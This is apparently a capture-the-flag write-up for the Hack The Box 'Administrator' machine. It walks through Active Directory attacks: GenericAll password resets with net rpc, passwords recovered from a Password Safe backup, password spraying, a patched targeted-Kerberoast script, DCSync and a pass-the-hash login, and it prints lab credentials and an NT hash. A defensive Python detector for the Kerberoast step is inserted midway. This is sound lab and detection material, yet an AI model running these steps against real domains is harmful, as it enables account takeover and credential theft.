HTB-Administrator

  • The box hands you an account at the start
  • GenericAll rights used to change other users' passwords
  • A password hidden in a file on an SMB share
  • ADCS privilege escalation


Abusing GenericAll from Linux

apt install -y heimdal-clients libsasl2-modules-gssapi-heimdal

vim ./custom_krb5.conf

[libdefaults]
default_realm = ADMINISTRATOR.HTB
dns_lookup_realm = true
dns_lookup_kdc = true

[realms]
ADMINISTRATOR.HTB = {
kdc = dc.administrator.htb
admin_server = dc.administrator.htb
default_domain = dc.administrator.htb
}

[domain_realm]
administrator.htb = ADMINISTRATOR.HTB
.administrator.htb = ADMINISTRATOR.HTB
  • export KRB5_CONFIG="$PWD/custom_krb5.conf"
  • kinit Olivia
  • klist
  • export KRB5CCNAME=/tmp/krb5cc_0


Then download the script and make a small change to its contents.

targetedKerberoast.py

        if TGT is None:
            if TGS is None:
                tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(clientName=userName, password=args.auth_password, domain=args.auth_domain, lmhash=None, nthash=auth_nt_hash,
                                                                        aesKey=args.auth_aes_key, kdcHost=args.dc_ip)
        else:
            tgt = TGT['KDC_REP']
            cipher = TGT['cipher']
            sessionKey = TGT['sessionKey']

        TGT = {}
        TGT['KDC_REP'] = tgt
        TGT['cipher'] = cipher
        TGT['sessionKey'] = sessionKey

Change it to:

        if TGT is None:
            if TGS is None:
                tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(clientName=userName, password=args.auth_password, domain=args.auth_domain, lmhash=None, nthash=auth_nt_hash,
                                                                        aesKey=args.auth_aes_key, kdcHost=args.dc_ip)

                TGT = {}
                TGT['KDC_REP'] = tgt
                TGT['cipher'] = cipher
                TGT['sessionKey'] = sessionKey

        else:
            tgt = TGT['KDC_REP']
            cipher = TGT['cipher']
            sessionKey = TGT['sessionKey']


The error was caused by clock skew: the attacking machine's time was not in sync with the DC.

  • apt install ntpdate
  • ntpdate 10.10.11.42

After that, just run john on the hash; but with the rockyou wordlist I was not able to crack it.


Switching approach

net rpc password "michael" "DDL666dll" -U "administrator.htb"/"olivia"%"ichliebedich" -S 10.10.11.42

That gives us the second user.

net rpc password "benjamin" "DDL666dll" -U "administrator.htb"/"michael"%"DDL666dll" -S 10.10.11.42

That gives us the third user.

Probing a bit:


net user benjamin shows that he is a member of the share administrators group.

Getting the third user

There is a backup file on the FTP server.

Passwords recovered from Backup.psafe3:

  • UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
    • alexander
  • UXLCI5iETUsIBoFVTj8yQFKoHjXmb
    • emily
  • WwANQWnmJnGV07WQN8bMS7FMAbjNur
    • emma

Password spraying to find a new valid account

nxc smb 10.10.11.42 -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

Getting the fourth user

python3 targetedKerberoast.py -v -d 'administrator.htb' -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

limpbizkit
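From the defender's side, the targeted Kerberoast step above leaves a distinctive trail: an SPN is written onto a user object, an RC4 service ticket is requested for that user, and the SPN is removed again, all by the same account within minutes. The following is an added example (not part of this writeup or of targetedKerberoast.py) that correlates that pattern over constructed event records; the record layout is an assumption modelled on Windows event 5136 (directory object modified, servicePrincipalName attribute) and 4769 (TGS request, encryption type 0x17 = RC4), and the names mirror the emily/ethan step on this box.

```python
# Added example: correlate SPN add -> RC4 TGS request -> SPN delete by one actor.
# Event dicts are a constructed, simplified model of Security log events 5136/4769.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs from the box).
EVENTS = [
    {"ts": "2025-05-14T09:25:00", "id": 5136, "actor": "emily", "target": "ethan",
     "attr": "servicePrincipalName", "op": "add"},
    {"ts": "2025-05-14T09:25:02", "id": 4769, "actor": "emily", "target": "ethan",
     "etype": 0x17},                                  # RC4-HMAC ticket
    {"ts": "2025-05-14T09:25:03", "id": 5136, "actor": "emily", "target": "ethan",
     "attr": "servicePrincipalName", "op": "delete"},
    # Benign: a normal service-ticket request using AES (0x12) and no SPN churn.
    {"ts": "2025-05-14T10:00:00", "id": 4769, "actor": "svc_backup", "target": "svc_sql",
     "etype": 0x12},
]


def _t(e):
    return datetime.fromisoformat(e["ts"])


def find_targeted_kerberoast(events, window=timedelta(minutes=10)):
    """Return (actor, target) pairs where one actor added an SPN to a user,
    requested an RC4 service ticket for it, and removed the SPN within `window`."""
    by_pair = defaultdict(list)
    for e in events:
        by_pair[(e["actor"], e["target"])].append(e)

    hits = []
    for pair, evs in by_pair.items():
        evs.sort(key=_t)
        spn = [e for e in evs if e["id"] == 5136 and e.get("attr") == "servicePrincipalName"]
        adds = [e for e in spn if e["op"] == "add"]
        dels = [e for e in spn if e["op"] == "delete"]
        rc4 = [e for e in evs if e["id"] == 4769 and e.get("etype") == 0x17]
        for a in adds:
            t0, t1 = _t(a), _t(a) + window
            if any(t0 <= _t(r) <= t1 for r in rc4) and any(t0 <= _t(d) <= t1 for d in dels):
                hits.append(pair)
                break   # one hit per actor/target pair is enough
    return hits


if __name__ == "__main__":
    print(find_targeted_kerberoast(EVENTS))   # [('emily', 'ethan')]
```

In a real deployment the same logic runs over 5136/4769 events shipped to a SIEM; auditing of directory object changes must be enabled on the DC for 5136 to be logged at all.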

Probing again:

crackmapexec smb 10.10.11.42 -u ethan -p 'limpbizkit'

No WinRM access, but that no longer matters: this user has DCSync rights, so we go straight for the administrator account.


Then log in with the hash:

evil-winrm -i dc.administrator.htb -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e

References